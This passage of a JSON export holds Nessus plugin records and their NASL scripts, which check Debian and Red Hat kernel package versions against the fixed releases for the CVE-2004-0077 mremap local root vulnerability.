available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:kernel-image-2.4.18-1-alpha\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:kernel-image-2.4.18-1-i386\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:kernel-image-2.4.18-i386bf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:kernel-patch-2.4.18-powerpc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:kernel-source-2.4.18\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:3.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2004/02/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2004/09/29\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2004-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"3.0\", prefix:\"kernel-doc-2.4.18\", reference:\"2.4.18-14.2\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"kernel-headers-2.4.18\", reference:\"2.4.18-1woody4\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"kernel-headers-2.4.18-1\", reference:\"2.4.18-12.2\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"kernel-headers-2.4.18-1-386\", reference:\"2.4.18-12.2\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"kernel-headers-2.4.18-1-586tsc\", reference:\"2.4.18-12.2\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"kernel-headers-2.4.18-1-686\", reference:\"2.4.18-12.2\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"kernel-headers-2.4.18-1-686-smp\", reference:\"2.4.18-12.2\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"kernel-headers-2.4.18-1-generic\", reference:\"2.4.18-14\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"kernel-headers-2.4.18-1-k6\", reference:\"2.4.18-12.2\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"kernel-headers-2.4.18-1-k7\", reference:\"2.4.18-12.2\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"kernel-headers-2.4.18-1-smp\", reference:\"2.4.18-14\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"kernel-headers-2.4.18-bf2.4\", reference:\"2.4.18-5woody7\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"kernel-image-2.4.18-1-386\", reference:\"2.4.18-12.2\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"kernel-image-2.4.18-1-586tsc\", reference:\"2.4.18-12.2\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"kernel-image-2.4.18-1-686\", reference:\"2.4.18-12.2\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"kernel-image-2.4.18-1-686-smp\", reference:\"2.4.18-12.2\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"kernel-image-2.4.18-1-generic\", reference:\"2.4.18-14\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"kernel-image-2.4.18-1-k6\", reference:\"2.4.18-12.2\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"kernel-image-2.4.18-1-k7\", reference:\"2.4.18-12.2\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"kernel-image-2.4.18-1-smp\", reference:\"2.4.18-14\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"kernel-image-2.4.18-bf2.4\", reference:\"2.4.18-5woody7\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"kernel-image-2.4.18-newpmac\", reference:\"2.4.18-1woody4\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"kernel-image-2.4.18-powerpc\", reference:\"2.4.18-1woody4\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"kernel-image-2.4.18-powerpc-smp\", reference:\"2.4.18-1woody4\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"kernel-patch-2.4.18-powerpc\", reference:\"2.4.18-1woody4\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"kernel-pcmcia-modules-2.4.18-1-386\", reference:\"2.4.18-12.2\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"kernel-pcmcia-modules-2.4.18-1-586tsc\", reference:\"2.4.18-12.2\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"kernel-pcmcia-modules-2.4.18-1-686\", reference:\"2.4.18-12.2\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"kernel-pcmcia-modules-2.4.18-1-686-smp\", reference:\"2.4.18-12.2\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"kernel-pcmcia-modules-2.4.18-1-k7\", reference:\"2.4.18-12.2\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"kernel-source-2.4.18\", reference:\"2.4.18-14.2\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-06T09:57:49", "description": "Paul Starzetz and Wojciech Purczynski of isec.pl discovered a critical\nsecurity vulnerability in the memory management code of Linux inside\nthe mremap(2) system call. Due to flushing the TLB (Translation\nLookaside Buffer, an address cache) too early it is possible for an\nattacker to trigger a local root exploit.\n\nThe attack vectors for 2.4.x and 2.2.x kernels are exclusive for the\nrespective kernel series, though. We formerly believed that the\nexploitable vulnerability in 2.4.x does not exist in 2.2.x which is\nstill true. However, it turned out that a second (sort of)\nvulnerability is indeed exploitable in 2.2.x, but not in 2.4.x, with a\ndifferent exploit, of course.", "edition": 25, "published": "2004-09-29T00:00:00", "title": "Debian DSA-453-1 : linux-kernel-2.2.20-i386+m68k+powerpc - failing function and TLB flush", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-0077"], "modified": "2004-09-29T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:kernel-image-2.2.20-i386", "p-cpe:/a:debian:debian_linux:kernel-patch-2.2.20-powerpc", "p-cpe:/a:debian:debian_linux:kernel-image-2.2.20-mac", "cpe:/o:debian:debian_linux:3.0", "p-cpe:/a:debian:debian_linux:kernel-image-2.2.20-bvme6000", "p-cpe:/a:debian:debian_linux:kernel-image-2.2.20-reiserfs-i386", "p-cpe:/a:debian:debian_linux:kernel-source-2.2.20", "p-cpe:/a:debian:debian_linux:kernel-image-2.2.20-mvme147", "p-cpe:/a:debian:debian_linux:kernel-image-2.2.20-atari", "p-cpe:/a:debian:debian_linux:kernel-image-2.2.20-amiga", "p-cpe:/a:debian:debian_linux:kernel-image-2.2.20-mvme16x"], "id": "DEBIAN_DSA-453.NASL", "href": "https://www.tenable.com/plugins/nessus/15290", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-453. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(15290);\n script_version(\"1.24\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2004-0077\");\n script_bugtraq_id(9686);\n script_xref(name:\"CERT\", value:\"981222\");\n script_xref(name:\"DSA\", value:\"453\");\n\n script_name(english:\"Debian DSA-453-1 : linux-kernel-2.2.20-i386+m68k+powerpc - failing function and TLB flush\");\n script_summary(english:\"Checks dpkg output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Paul Starzetz and Wojciech Purczynski of isec.pl discovered a critical\nsecurity vulnerability in the memory management code of Linux inside\nthe mremap(2) system call. Due to flushing the TLB (Translation\nLookaside Buffer, an address cache) too early it is possible for an\nattacker to trigger a local root exploit.\n\nThe attack vectors for 2.4.x and 2.2.x kernels are exclusive for the\nrespective kernel series, though. We formerly believed that the\nexploitable vulnerability in 2.4.x does not exist in 2.2.x which is\nstill true. However, it turned out that a second (sort of)\nvulnerability is indeed exploitable in 2.2.x, but not in 2.4.x, with a\ndifferent exploit, of course.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://isec.pl/vulnerabilities/isec-0014-mremap-unmap.txt\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.debian.org/security/2004/dsa-453\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the Linux kernel package.\n\nFor the stable distribution (woody) this problem has been fixed in the\nfollowing versions and architectures :\n\n package arch version \n kernel-source-2.2.20 source 2.2.20-5woody3 \n kernel-image-2.2.20-i386 i386 2.2.20-5woody5 \n kernel-image-2.2.20-reiserfs-i386 i386 2.2.20-4woody1 \n kernel-image-2.2.20-amiga m68k 2.20-4 \n kernel-image-2.2.20-atari m68k 2.2.20-3 \n kernel-image-2.2.20-bvme6000 m68k 2.2.20-3 \n kernel-image-2.2.20-mac m68k 2.2.20-3 \n kernel-image-2.2.20-mvme147 m68k 2.2.20-3 \n kernel-image-2.2.20-mvme16x m68k 2.2.20-3 \n kernel-patch-2.2.20-powerpc powerpc 2.2.20-3woody1 \n Vulnerability matrix for CAN-2004-0077\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:kernel-image-2.2.20-amiga\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:kernel-image-2.2.20-atari\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:kernel-image-2.2.20-bvme6000\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:kernel-image-2.2.20-i386\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:kernel-image-2.2.20-mac\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:kernel-image-2.2.20-mvme147\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:kernel-image-2.2.20-mvme16x\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:kernel-image-2.2.20-reiserfs-i386\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:kernel-patch-2.2.20-powerpc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:kernel-source-2.2.20\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:3.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2004/03/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2004/09/29\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2004-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"3.0\", prefix:\"kernel-doc-2.2.20\", reference:\"2.2.20-5woody3\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"kernel-headers-2.2.20\", reference:\"2.2.20-3woody1\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"kernel-headers-2.2.20-compact\", reference:\"2.2.20-5woody5\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"kernel-headers-2.2.20-idepci\", reference:\"2.2.20-5woody5\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"kernel-headers-2.2.20-reiserfs\", reference:\"2.2.20-4woody1\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"kernel-image-2.2.20\", reference:\"2.2.20-5woody5\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"kernel-image-2.2.20-amiga\", reference:\"2.2.20-4\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"kernel-image-2.2.20-atari\", reference:\"2.2.20-3\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"kernel-image-2.2.20-bvme6000\", reference:\"2.2.20-3\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"kernel-image-2.2.20-chrp\", reference:\"2.2.20-3woody1\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"kernel-image-2.2.20-compact\", reference:\"2.2.20-5woody5\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"kernel-image-2.2.20-idepci\", reference:\"2.2.20-5woody5\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"kernel-image-2.2.20-mac\", reference:\"2.2.20-3\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"kernel-image-2.2.20-mvme147\", reference:\"2.2.20-3\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"kernel-image-2.2.20-mvme16x\", reference:\"2.2.20-3\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"kernel-image-2.2.20-pmac\", reference:\"2.2.20-3woody1\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"kernel-image-2.2.20-prep\", reference:\"2.2.20-3woody1\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"kernel-image-2.2.20-reiserfs\", reference:\"2.2.20-4woody1\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"kernel-patch-2.2.20-powerpc\", reference:\"2.2.20-3woody1\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"kernel-source-2.2.20\", reference:\"2.2.20-5woody3\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-06T09:57:59", "description": "Paul Starzetz and Wojciech Purczynski of isec.pl discovered a critical\nsecurity vulnerability in the memory management code of Linux inside\nthe mremap(2) system call. Due to flushing the TLB (Translation\nLookaside Buffer, an address cache) too early it is possible for an\nattacker to trigger a local root exploit.\n\nThe attack vectors for 2.4.x and 2.2.x kernels are exclusive for the\nrespective kernel series, though. We formerly believed that the\nexploitable vulnerability in 2.4.x does not exist in 2.2.x which is\nstill true. However, it turned out that a second (sort of)\nvulnerability is indeed exploitable in 2.2.x, but not in 2.4.x, with a\ndifferent exploit, of course.", "edition": 26, "published": "2004-09-29T00:00:00", "title": "Debian DSA-456-1 : linux-kernel-2.2.19-arm - failing function and TLB flush", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-0077"], "modified": "2004-09-29T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:kernel-image-2.2.19-netwinder", "cpe:/o:debian:debian_linux:3.0", "p-cpe:/a:debian:debian_linux:kernel-patch-2.2.19-arm", "p-cpe:/a:debian:debian_linux:kernel-image-2.2.19-riscpc", "p-cpe:/a:debian:debian_linux:kernel-source-2.2.19"], "id": "DEBIAN_DSA-456.NASL", "href": "https://www.tenable.com/plugins/nessus/15293", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-456. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(15293);\n script_version(\"1.27\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2004-0077\");\n script_bugtraq_id(9686);\n script_xref(name:\"CERT\", value:\"981222\");\n script_xref(name:\"DSA\", value:\"456\");\n\n script_name(english:\"Debian DSA-456-1 : linux-kernel-2.2.19-arm - failing function and TLB flush\");\n script_summary(english:\"Checks dpkg output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Paul Starzetz and Wojciech Purczynski of isec.pl discovered a critical\nsecurity vulnerability in the memory management code of Linux inside\nthe mremap(2) system call. Due to flushing the TLB (Translation\nLookaside Buffer, an address cache) too early it is possible for an\nattacker to trigger a local root exploit.\n\nThe attack vectors for 2.4.x and 2.2.x kernels are exclusive for the\nrespective kernel series, though. We formerly believed that the\nexploitable vulnerability in 2.4.x does not exist in 2.2.x which is\nstill true. However, it turned out that a second (sort of)\nvulnerability is indeed exploitable in 2.2.x, but not in 2.4.x, with a\ndifferent exploit, of course.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://isec.pl/vulnerabilities/isec-0014-mremap-unmap.txt\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.debian.org/security/2004/dsa-456\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the Linux kernel package.\n\nFor the stable distribution (woody) this problem has been fixed in\nversion 20040303 of 2.2 kernel images for the arm architecture.\n\n Vulnerability matrix for CAN-2004-0077\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:kernel-image-2.2.19-netwinder\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:kernel-image-2.2.19-riscpc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:kernel-patch-2.2.19-arm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:kernel-source-2.2.19\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:3.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2004/03/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2004/09/29\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2004-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"3.0\", prefix:\"kernel-doc-2.2.19\", reference:\"2.2.19.1-4woody1\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"kernel-headers-2.2.19\", reference:\"20040303\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"kernel-image-2.2.19-netwinder\", reference:\"20040303\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"kernel-image-2.2.19-riscpc\", reference:\"20040303\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"kernel-patch-2.2.19-arm\", reference:\"20040303\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"kernel-source-2.2.19\", reference:\"2.2.19.1-4woody1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-06T10:02:51", "description": "Paul Starzetz and Wojciech Purczynski of isec.pl discovered a critical\nsecurity vulnerability in the memory management code of Linux inside\nthe mremap(2) system call. Due to flushing the TLB (Translation\nLookaside Buffer, an address cache) too early it is possible for an\nattacker to trigger a local root exploit.\n\nThe attack vectors for 2.4.x and 2.2.x kernels are exclusive for the\nrespective kernel series, though. We formerly believed that the\nexploitable vulnerability in 2.4.x does not exist in 2.2.x which is\nstill true. However, it turned out that a second (sort of)\nvulnerability is indeed exploitable in 2.2.x, but not in 2.4.x, with a\ndifferent exploit, of course.", "edition": 25, "published": "2004-09-29T00:00:00", "title": "Debian DSA-514-1 : kernel-image-sparc-2.2 - failing function and TLB flush", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-0077"], "modified": "2004-09-29T00:00:00", "cpe": ["cpe:/o:debian:debian_linux:3.0", "p-cpe:/a:debian:debian_linux:kernel-source-2.2.20", "p-cpe:/a:debian:debian_linux:kernel-image-sparc-2.2"], "id": "DEBIAN_DSA-514.NASL", "href": "https://www.tenable.com/plugins/nessus/15351", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-514. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(15351);\n script_version(\"1.25\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2004-0077\");\n script_bugtraq_id(9686);\n script_xref(name:\"CERT\", value:\"981222\");\n script_xref(name:\"DSA\", value:\"514\");\n\n script_name(english:\"Debian DSA-514-1 : kernel-image-sparc-2.2 - failing function and TLB flush\");\n script_summary(english:\"Checks dpkg output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Paul Starzetz and Wojciech Purczynski of isec.pl discovered a critical\nsecurity vulnerability in the memory management code of Linux inside\nthe mremap(2) system call. Due to flushing the TLB (Translation\nLookaside Buffer, an address cache) too early it is possible for an\nattacker to trigger a local root exploit.\n\nThe attack vectors for 2.4.x and 2.2.x kernels are exclusive for the\nrespective kernel series, though. We formerly believed that the\nexploitable vulnerability in 2.4.x does not exist in 2.2.x which is\nstill true. However, it turned out that a second (sort of)\nvulnerability is indeed exploitable in 2.2.x, but not in 2.4.x, with a\ndifferent exploit, of course.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.debian.org/security/2004/dsa-514\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the Linux kernel package.\n\nFor the stable distribution (woody) these problems have been fixed in\nversion 9woody1 of Linux 2.2 kernel images for the sparc architecture\nand in version 2.2.20-5woody3 of Linux 2.2.20 source.\n\nThis problem has been fixed for other architectures already.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:kernel-image-sparc-2.2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:kernel-source-2.2.20\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:3.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2004/06/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2004/09/29\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2004-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"3.0\", prefix:\"kernel-doc-2.2.20\", reference:\"2.2.20-5woody3\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"kernel-headers-2.2.20-sparc\", reference:\"9woody1\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"kernel-image-2.2.20-sun4cdm\", reference:\"9woody1\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"kernel-image-2.2.20-sun4dm-smp\", reference:\"9woody1\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"kernel-image-2.2.20-sun4u\", reference:\"9woody1\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"kernel-image-2.2.20-sun4u-smp\", reference:\"9woody1\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"kernel-source-2.2.20\", reference:\"2.2.20-5woody3\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T13:05:17", "description": "Updated kernel packages that fix a security vulnerability that may\nallow local users to gain root privileges are now available. These\npackages also resolve other minor issues.\n\nThe Linux kernel handles the basic functions of the operating system.\n\nPaul Starzetz discovered a flaw in return value checking in mremap()\nin the Linux kernel versions 2.4.24 and previous that may allow a\nlocal attacker to gain root privileges. No exploit is currently\navailable; however this issue is exploitable. The Common\nVulnerabilities and Exposures project (cve.mitre.org) has assigned the\nname CVE-2004-0077 to this issue.\n\nAll users are advised to upgrade to these errata packages, which\ncontain backported security patches that correct these issues.\n\nRed Hat would like to thank Paul Starzetz from ISEC for reporting this\nissue.\n\nFor the IBM S/390 and IBM eServer zSeries architectures, the upstream\nversion of the s390utils package (which fixes a bug in the zipl\nbootloader) is also included.", "edition": 28, "published": "2004-07-06T00:00:00", "title": "RHEL 3 : kernel (RHSA-2004:066)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-0077"], "modified": "2004-07-06T00:00:00", "cpe": ["cpe:/o:redhat:enterprise_linux:3", "p-cpe:/a:redhat:enterprise_linux:kernel-BOOT", "p-cpe:/a:redhat:enterprise_linux:s390utils", "p-cpe:/a:redhat:enterprise_linux:kernel-hugemem-unsupported", "p-cpe:/a:redhat:enterprise_linux:kernel-unsupported", "p-cpe:/a:redhat:enterprise_linux:kernel-smp", "p-cpe:/a:redhat:enterprise_linux:kernel", "p-cpe:/a:redhat:enterprise_linux:kernel-source", "p-cpe:/a:redhat:enterprise_linux:kernel-smp-unsupported", "p-cpe:/a:redhat:enterprise_linux:kernel-hugemem", "p-cpe:/a:redhat:enterprise_linux:kernel-doc"], "id": "REDHAT-RHSA-2004-066.NASL", "href": "https://www.tenable.com/plugins/nessus/12468", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and 